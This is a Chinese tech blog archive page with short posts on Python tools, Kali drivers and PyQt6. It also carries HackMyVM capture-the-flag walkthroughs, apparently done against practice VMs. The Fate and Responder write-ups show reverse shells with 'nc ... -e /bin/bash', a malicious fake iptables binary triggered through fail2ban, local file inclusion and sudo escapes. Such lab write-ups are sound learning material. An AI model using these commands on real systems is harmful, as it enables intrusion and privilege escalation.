作者归档:站长

Atom Walkthrough

发表评论

HackmyVm的靶机Atom,下载地址是https://hackmyvm.eu/machines/machine.php?vm=Atom

正常nmap扫描,只能找到22端口,非常蹊跷。卡在第一步就非常郁闷了,cromiphi制作的靶机总是有点小坑的!

└─$ nmap -sV -sC -Pn  -oN port.log 192.168.56.118  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 20:20 CST
Nmap scan report for 192.168.56.118
Host is up (0.0026s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_  256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

继续阅读

整了个鸿蒙官方文档的下载器

发表评论

HarmonyOs的官方开发文档非常有价值,但有时不能联网,所以写了个小脚本,批量下载并打包成epub。python代码,命令行界面使用PyInquirer实现,用pygments库实现代码高亮。
主界面如下:

***************************************************
HarmonyOs Development Guides/References Downloader
功能:下载HarmonyOs的官方文档并生成epub
版本:3.0
时间:2024-07-18
****************************************************
? 主功能菜单,选择你的操作:  (Use arrow keys)
 ❯  1) 下载应用开发文档(3.1/4.0,已归档)
    2) 下载API参考文档(3.1/4.0,已归档)
    3) 下载应用开发文档(next)
    4) 下载API参考文档(next)
    5) 下载AGC文档
    6) 下载设计指南
    7) 退出程序

继续阅读

修改python的amzqr库,使其支持中文编码

发表评论

amzqr是一个非常方便的文字信息生成二维码的python库,美中不足是原作者代码不支持中文。根据github上提交的pr,记录一下支持中文的修改方法。

1. 修改amzqr.py

    #if not isinstance(words, str) or any(i not in supported_chars for i in words):
    #不对中文字符进行检测
    if not isinstance(words, str):

继续阅读

Kali对AWUS1900网卡的支持

发表评论

AWUS1900性能很强,但对Kali的支持并不太好,不能免驱。
驱动程序安装如下:

apt install linux-headers-$(uname -r)
apt install realtek-rtl8814au-dkms

一定要安装头文件,直接安装realtek驱动没用。然后需要重新启动linux才能进入monitor模式。但实测效果还不如其它AWUS卡。

绕过PyQt6的一些小坑

发表评论

直接进入干货,供遇到相同情况的小伙伴参考。

一、pyuic6导出designer设计的窗体,py代码不完全兼容PyQt6

用Qt Designer设计完界面后,要用pyuic6导出为py文件,再在代码中调用,但直接调用会报错,原因是部分代码(主要是窗体对齐)导出的还是PyQt5的格式。
如导出为:

QtCore.Qt.AlignHCenter

在PyQt6下应该是:

QtCore.Qt.AlignmentFlag.AlignHCenter

需要将所有的对齐代码修改过来。可以用脚本自动处理(在windows下时可用wsl执行)。

awk '{sub(/Qt.AlignH/,"Qt.AlignmentFlag.AlignH");sub(/Qt.AlignL/,"Qt.AlignmentFlag.AlignL
");sub(/Qt.AlignB/,"Qt.AlignmentFlag.AlignB");sub(/Qt.AlignV/,"Qt.AlignmentFlag.AlignV");sub(/Qt.AlignT/,"Qt.AlignmentFlag.AlignT");sub(/Qt.AlignR/,"Qt.AlignmentFlag.AlignR"
);print $0}'

继续阅读

HackMyVm Fate Walkthrough

发表评论

HackMyVm Fate Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Fate

Fate is really an interesting machine made by sML. Let's begin!

Scan ports first.

nmap -sV -sC -p- -oN port.log 192.168.56.100
Nmap scan report for 192.168.56.100
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 61:39:bc:89:db:98:a7:63:15:fe:13:54:01:22:8d:52 (RSA)
|   256 bb:a3:b7:24:76:9c:fd:27:8f:13:ef:f5:cf:4f:8b:ab (ECDSA)
|_  256 0c:af:8b:a0:fa:3f:7b:38:52:b4:93:a0:65:da:c0:7c (ED25519)
80/tcp    open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
13120/tcp open  http    Node.js Express framework
|_http-title: Gancio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Start from port 80. Scan files and dirs.

gobuster dir -u "http://192.168.56.100" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html           (Status: 200) [Size: 285]
/uploads              (Status: 301) [Size: 169] [--> http://192.168.56.100/uploads/]
/upload.php           (Status: 200) [Size: 46]

Check port 80, it will upload any file we choose and rename it.

And the file is saved in /uploads/.

~/D/fate $curl "http://192.168.56.100/uploads/8662cb1f0bdeaa8572492ad1de71e293"          19:47:01
<?php                                                                                            
// php-reverse-shell - A Reverse Shell implementation in PHP                                     ...

We can not bypass the upload.php, but if we take care enough, we notice there is a short time delay after we click upload. So we guess, the shell php is first saved, then renamed.

We create a simple bash to continuously check /uploads/shell.php, and upload shell.php.

#!/bin/bash
while true
do
  curl "http://192.168.56.100/uploads/shell.php"
  sleep 0.2
done

Then we can get reverse shell.

~/D/fate $nc -nvlp 1234                                                                  19:51:49
listening on [any] 1234 ...
connect to [192.168.56.151] from (UNKNOWN) [192.168.56.100] 34110
Linux fate 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64 GNU/Linux
 11:50:57 up 58 min,  1 user,  load average: 0.01, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
john     pts/2    192.168.56.151   11:32   10:41   0.15s  0.15s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now we found 3 users at home folder.

www-data@fate:/$ cd home
cd home
www-data@fate:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root   root   4096 Feb 16 10:33 .
drwxr-xr-x 18 root   root   4096 Feb 16 10:23 ..
drwxr-xr-x  2 connor connor 4096 Mar  5 11:32 connor
drwxr-xr-x  4 john   john   4096 Mar  5 11:32 john
drwxr-xr-x  2 sarah  sarah  4096 Feb 16 10:33 sarah

In /opt, we found the server files of port 13120.

www-data@fate:/opt/gancio$ ls -la
ls -la
total 20
drwxr-xr-x 4 gancio gancio 4096 Feb 16 10:51 .
drwxr-xr-x 3 root   root   4096 Feb 16 10:40 ..
-rw-r--r-- 1 gancio gancio  474 Feb 16 10:51 config.json
drwxr-xr-x 2 gancio gancio 4096 Mar  5 10:52 logs
drwxr-xr-x 3 gancio gancio 4096 Feb 16 10:51 uploads

In config.json, we get creds of database. 

www-data@fate:/opt/gancio$ cat config.json
...
    "database": "gancio",
    "username": "xxxxx",
    "password": "xxxxx",
...

Log in mysql, and get 2 password hash.

MariaDB [gancio]> use gancio
use gancio
Database changed
MariaDB [gancio]> show tables;
show tables;
+---------------------+
| Tables_in_gancio    |
+---------------------+
...
| users               |
+---------------------+
17 rows in set (0.000 sec)
MariaDB [gancio]> select * from users;
select * from users;
+----+--------------+----------+------------------+-------------+------------------------
| id | display_name | settings | email            | description | password                                                     | recover_code | is_admin | is_active | rsa  | createdAt           | updatedAt           |
+----+--------------+----------+------------------+-------------+------------------------
|  1 | NULL         | []       | admin            | NULL        | $2a$10$FSC73AzC1b9byrVIyEB6M.eTxxxxxxxxxxxxxxxxxxxxx.e2 | NULL         |        1 |         1 | NULL | 2022-02-16 09:51:21 | 2022-02-16 09:51:21 |
|  2 | NULL         | []       | connor@localhost | NULL        | $2a$10$U1/NLsG/tYgmr.Guimmv/eTxxxxxxxxxxxxxxxxxxxxx |              |        0 |         1 | NULL | 2022-02-16 09:52:04 | 2022-02-16 09:52:11 |
+----+--------------+----------+------------------+-------------+------------------------
2 rows in set (0.001 sec)

Save the hash and crack them with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

There is only one hash crackable. That's actually the password of user connor. Then we can login ssh as connor.

ssh connor@192.168.56.100                                                      20:02:02
connor@192.168.56.100's password: 
...
connor@fate:~$ id
uid=1000(connor) gid=1000(connor) groups=1000(connor),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Check sudo -l.

connor@fate:~$ sudo -l
Matching Defaults entries for connor on fate:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User connor may run the following commands on fate:
    (john) NOPASSWD: /usr/bin/fzf

After a long time learning how to use fzf, we get two ways to exploit fzf.

First is to use --preview="nc 192.168.56.151 1234 -e /bin/bash {}" option.

nc -nlvp 1234                                                                  20:06:58
listening on [any] 1234 ...
connect to [192.168.56.151] from (UNKNOWN) [192.168.56.100] 34118
id
uid=1001(john) gid=1001(john) groups=1001(john)
──────────────────────────────────────────────────────────────────────────────────────────
connor@fate:/home/john$ sudo -u john /usr/bin/fzf --preview="nc 192.168.56.151 1234 -e /bin/bash {}"

Another way is to use fzf --bind 'f2:execute(nc -nlvp x.x.x.x xxxx -e /bin/bash {})' . Then run fzf, and press F2.

Anyway, now we escalate to user john. We can upload id_rsa.pub, so we can login ssh as user john easily.

Check sudo -l again.

john@fate:~$ sudo -l
Matching Defaults entries for john on fate:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on fate:
    (root) NOPASSWD: /usr/bin/systemctl restart fail2ban

Fail2ban , another new program we need to learn. So after we carefully read the help, we know that fail2ban is a firewall management program, and it calls iptables to take action.

We create a fake iptables with shell code in /tmp.

john@fate:~$ echo "nc 192.168.56.151 1234 -e /bin/bash" > /tmp/iptables
john@fate:~$ chmod +x /tmp/iptables

The config files of fail2ban is located at /etc/fail2ban. Some key options are as following:

john@fate:/etc/fail2ban$ cat jail.conf
...
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10m

# "maxretry" is the number of failures before a host get banned.
maxretry = 5

You can change maxretry to 1, then fail2ban will start action after 1 time login failure.

john@fate:/etc/fail2ban/action.d$ cat iptables-common.conf
...
# Option:  iptables
# Notes.:  Actual command to be executed, including common to all calls options
# Values:  STRING
iptables = iptables <lockingopt>

We change iptables to /tmp/iptables.

Now run sudo command to restart fail2ban.

After we try to login ssh as some none exist user, our shell code runs. We get root!

john@fate:/etc/fail2ban/action.d$ sudo /usr/bin/systemctl restart fail2ban
─────────────────────────────────────────────────────────────────────────────────────────
~/D/fate $nc -nlvp 1234                                                                 
listening on [any] 1234 ...
connect to [192.168.56.151] from (UNKNOWN) [192.168.56.100] 34122
id;hostname
uid=0(root) gid=0(root) grupos=0(root)
fate
─────────────────────────────────────────────────────────────────────────────────────────
~/D/fate $ssh john2@192.168.56.100                                                       20:21:11
john2@192.168.56.100's password:

HackMyVm Blog Walkthrough

发表评论

HackMyVm Blog Walkthrough

Scan ports.

nmap -sV -sC -p- -oN port.log 192.168.56.100
Nmap scan report for furious.hmv (192.168.56.100)
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
|   256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
|_  256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

继续阅读

HackMyVm Responder Walkthrough

发表评论

HackMyVm Responder Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Responder

Scan ports, notice the port 22 is filtered.

nmap -sV -sC -oN port.log 192.168.56.100
Nmap scan report for darkmatter.hmv (192.168.56.100)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)

Check port 80, only a simple page tells the current time.

~/D/responder $curl 192.168.56.100                                              
your answer is in the answer.. it's
01:46
and your time is running out..

Scan port 80, found filemanager.php. Scan threads can not be too big, I set it to 20.

~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
/index.php            (Status: 200) [Size: 73]
/filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the param of filemanager.php, get random.

~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
=====================================================================
ID           Response   Lines    Word       Chars       Payload                 
=====================================================================
000003395:   302        27 L     39 W       1430 Ch     "random"

LFI worked, check passwd, get two user names.

~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"         
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash

After enum some linux files, we can not get shell through log files. So check source code of filemanager.php, we get a ssh key.

~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-en
code/resource=filemanager.php" |base64 -d                                                
...          
<?php                                                                                    
    $filename = $_GET['random'];
    include($filename);
    header('Location:/');

/*

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED 
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4

XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
...

Decrypt the ssh key with john.

~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt                     
~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt         
...
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx          (id_rsa)

Now we have the user name, ssh key and password to connect port 22, but port 22 is filtered. Maybe it can be connected through ipv6.

Check ipv6 address of the machine.

~/D/responder $ping6 -c2 -n -I eth1 ff02::1                                    
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
...
64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
...

Check port 22 with ipv6, yes, it's open.

~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
Nmap scan report for fe80::a00:27ff:fec2:1426
Host is up (0.0097s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Log in ssh as user elliot.

~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6    
Enter passphrase for key 'id_rsa': 
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Temporary failure in name resolution
Matching Defaults entries for elliot on responder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User elliot may run the following commands on responder:
    (rohit) NOPASSWD: /usr/bin/calc

Run calc, enter help page, input "!/bin/bash" after ":".

elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Temporary failure in name resolution
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type:  help copyright
[Type "exit" to exit, or "help" for help.]

; help
...
For more information while running calc, type  help  followed by one of the
following topics:

    topic               description
    -----               -----------
    intro               introduction to calc
    overview            overview of calc
    help                this file
...
!/bin/bash
...
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files, notice polkit.

elliot@responder:~$ find / -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

继续阅读